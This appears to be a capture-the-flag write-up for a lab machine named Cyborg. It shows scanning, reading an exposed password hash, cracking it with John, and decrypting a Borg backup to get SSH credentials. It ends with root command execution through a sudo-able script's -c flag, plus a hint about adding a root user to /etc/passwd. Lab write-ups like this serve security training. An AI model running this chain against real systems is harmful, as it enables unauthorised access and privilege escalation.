# Cyborg

## Nmap

```bash
sudo nmap 10.10.159.139 -p- -sS -sV

PORT   STATE    SERVICE VERSION

22/tcp open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.18 ((Ubuntu))

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Default root page for the web server points to the Apache2 page.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F9jh3G1vDKl479t0oeXiu%2Fimage.png?alt=media\&token=3f7d18e5-d8e1-48ff-be67-0b0a63ad8dc1)

We can then use `feroxbuster` to enumerate further directories and files.

```bash
feroxbuster -u <IP> -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FYaZuG6Ahvn3z0fPq6UMJ%2Fimage.png?alt=media\&token=0baedbb5-5624-46e3-8b0a-be8997011485)

From the results above the /etc/squid/passwd is potentially interesting. Using curl we can read the contents of the file from the terminal.

```bash
curl http://<IP>/etc/squid/passwd
```

Reveals the user and hash combination: `music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.`

This was then cracked using John against the rockyou.txt wordlist.

```bash
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt   
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FCy08nLPPYwSAIysD0Dv4%2Fcyborg-John.png?alt=media\&token=0547674a-a06b-4859-8495-c331dbe3a17b)

For now, we can keep a note of the cracked password. Looking again at the feroxbuster results we can browse to `http://<IP>/admin` which shows the web page below.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FVkfTMfq2qLMGoFEDFo9i%2Fimage.png?alt=media\&token=4e7de314-4745-43ac-9f80-76944b9fa9a7)

Under the Archive drop down menu there is an opporunity to download a `archive.tar` compressed archive. This archive is extractable without providing a password.

The archive extracts down into the path: `home/field/dev/final_archive/`

Looking through the files `README.txt` gives indication that the archive was created with Borg Backup.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F8LwfmEcnJRLT9bjusJKE%2Fimage.png?alt=media\&token=794e2309-66b3-4ff9-a4c7-9db84a51a55a)

The command below will install Borg Backup.

```bash
sudo apt-get install borgbackup
```

Shown below are the commands and linked documentation for listing and extract Borg archives. As shown in the second command the archive can be extract with Borg, where we will be prompted to provide password authentication to decrypt and extract the archive.

```bash
# https://borgbackup.readthedocs.io/en/stable/usage/list.html
borg list ~/Downloads/home/field/dev/final_archive 

# https://borgbackup.readthedocs.io/en/stable/usage/extract.html
borg extract ~/Downloads/home/field/dev/final_archive/::music_archive
```

After entering the cracked password from earlier, the command below can be used to find interesting files within the newly extract archive which appears to represent the user profile for the user alex.

```bash
find ~/Desktop/home -name *.txt 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fhj56P6mKv5wSIje8nvF9%2Fimage.png?alt=media\&token=fda6dcab-d18a-4efd-8381-f32a1f1aecff)

The `note.txt` file in Alex's documents reveals a password for his `SSH` login.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FMevUzfUUvzXxU8ZB8UiY%2Fimage.png?alt=media\&token=66f85577-d016-4a4c-b926-42359e5fb249)

After successfully logging in with SSH we are able to check what `sudo` permissions Alex has on the target system.

Checking `sudo -l`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FS96qmiwIHY8XGVjf1ROa%2Fimage.png?alt=media\&token=309889cd-37e0-44e0-8345-7a0b7d20d1d5)

Alex has the ability to run `sudo` as any user without providing a password on the bash script `/etc/mp3backups/backup.sh`.

```bash
#!/bin/bash

sudo find / -name "*.mp3" | sudo tee /etc/mp3backups/backed_up_files.txt


input="/etc/mp3backups/backed_up_files.txt"
#while IFS= read -r line
#do
  #a="/etc/mp3backups/backed_up_files.txt"
#  b=$(basename $input)
  #echo
#  echo "$line"
#done < "$input"

while getopts c: flag
do
        case "${flag}" in 
                c) command=${OPTARG};;
        esac
done



backup_files="/home/alex/Music/song1.mp3 /home/alex/Music/song2.mp3 /home/alex/Music/song3.mp3 /home/alex/Music/song4.mp3 /home/alex/Music/song5.mp3 /home/alex/Music/song6.mp3 /home/alex/Music/song7.mp3 /home/alex/Music/song8.mp3 /home/alex/Music/song9.mp3 /home/alex/Music/song10.mp3 /home/alex/Music/song11.mp3 /home/alex/Music/song12.mp3"

# Where to backup to.
dest="/etc/mp3backups/"

# Create archive filename.
hostname=$(hostname -s)
archive_file="$hostname-scheduled.tgz"

# Print start status message.
echo "Backing up $backup_files to $dest/$archive_file"

echo

# Backup the files using tar.
tar czf $dest/$archive_file $backup_files

# Print end status message.
echo
echo "Backup finished"

cmd=$($command)
echo $cmd
```

There is an opportunity to run commands at the end of the script.

```bash
cmd=$($command)
echo $cmd
```

Running a command after the script using the `-c` parameter allows commands to be executed in the context of root.

{% hint style="info" %}
reading the contents of `/home/alex/.bash_history` also shows where the user alex has used the same methods previously to perform elevated functions with the script.
{% endhint %}

```bash
sudo /etc/mp3backups/backup.sh -c "cat /root/root.txt"
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F8C17XnmP5H5jCcTAtwG7%2Fcyborg_Pe.png?alt=media\&token=4165c351-8ff8-4c5e-961d-142262e35cdf)

This allows for the root flag to be read.

{% hint style="info" %}
For a root shell its possible to use this function to echo in a new root user into /etc/passwd.
{% endhint %}